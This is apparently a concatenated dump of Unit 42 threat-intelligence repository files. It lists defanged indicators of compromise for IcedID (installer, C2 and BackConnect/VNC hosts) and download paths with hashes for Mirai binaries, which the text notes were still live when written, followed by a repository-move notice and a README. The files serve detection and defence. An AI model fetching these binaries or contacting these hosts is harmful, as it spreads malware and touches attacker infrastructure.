INSTALLER RETRIEVES GZIP BINARY 62 | 63 | - 172.67.140[.]91 port 80 - podiumstrtss[.]com - GET / HTTP/1.1 64 | 65 | POST-INFECTION ICEDID C2: 66 | 67 | - 193.109.120[.]27 port 443 - smakizelkopp[.]com - HTTPS traffic 68 | - 128.199.151[.]179 port 443 - pokerstorstool[.]com - HTTPS traffic 69 | 70 | BACKCONNECT AND KEYHOLE VNC TRAFFIC: 71 | 72 | - 137.184.172[.]23 port 443 - TCP traffic for BackConnect and Keyhole VNC 73 | -------------------------------------------------------------------------------- /2023-08-10-moved-to-new-Github-repository.txt: -------------------------------------------------------------------------------- 1 | New threat intel data from Palo Alto Networks Unit 42 for our Timely Threat Intelligence (TTI) posts on social media will be posted to the following Github repository: 2 | 3 | - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/tree/main 4 | -------------------------------------------------------------------------------- /Mirai_updated_F5: -------------------------------------------------------------------------------- 1 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm5 - 76de9dc7d6aedfab1062ad2a739e97a4e58773c41e37aa732861ac4ead745da7 2 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm6 - ac484d4a5bd7d470d4345f167ff9c9e79f2bee949460948989a7f20e5e3181c4 3 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm7- 1ff02d986dc1f18a65d133786eba16ee7c614e9dbdd3fbc78129ec0918633e8a 4 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.arm - a0f32b9bb1c45412bf10f87e2344cd9fff5b405032d1e1be7fb92922c0918ffd 5 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.m68k - 14303039cfd1b41c90e767cf3f549ac8854f659e13db4a1d0cf93c632cc43612 6 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.mips - ff17da93817543ac3d8fa8dc150ceaafd03ad89bb4a4218dfa8da4cbd21037bd 7 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.mpsl - 32b471d5c1e28126f09ed7516cce79653cb2e316009f8e213194f436823cd227 8 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.ppc - 9eebc34f58c4bd09c242214a8d6ac26e51367d0d2d1b862d79d7ac84a6952148 9 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.sh4 - 6364dc208073b4e5194741ee5a0f53435d0550e640e85368835a1e1118fcc92e 10 | Mar 19, 2021, 13:07 UTC - 203[.]159.80.241/bins/dark.x86 - 64a8522dcd5007323bdd1d4e255029c6b9ba47535cb3a668894cf504e3e5c043 11 | 12 | Samples are still live at the time of writing. 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # tweets 2 | This repository contains files associated with tweets from the @Unit42_Intel handle on Twitter. 3 | 4 | 5 | After 2023-08-09, all Github posts supporting our Timely Threat Intelligence Program to social media channels are on the following Github repository: 6 | 7 | https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/tree/main 8 | --------------------------------------------------------------------------------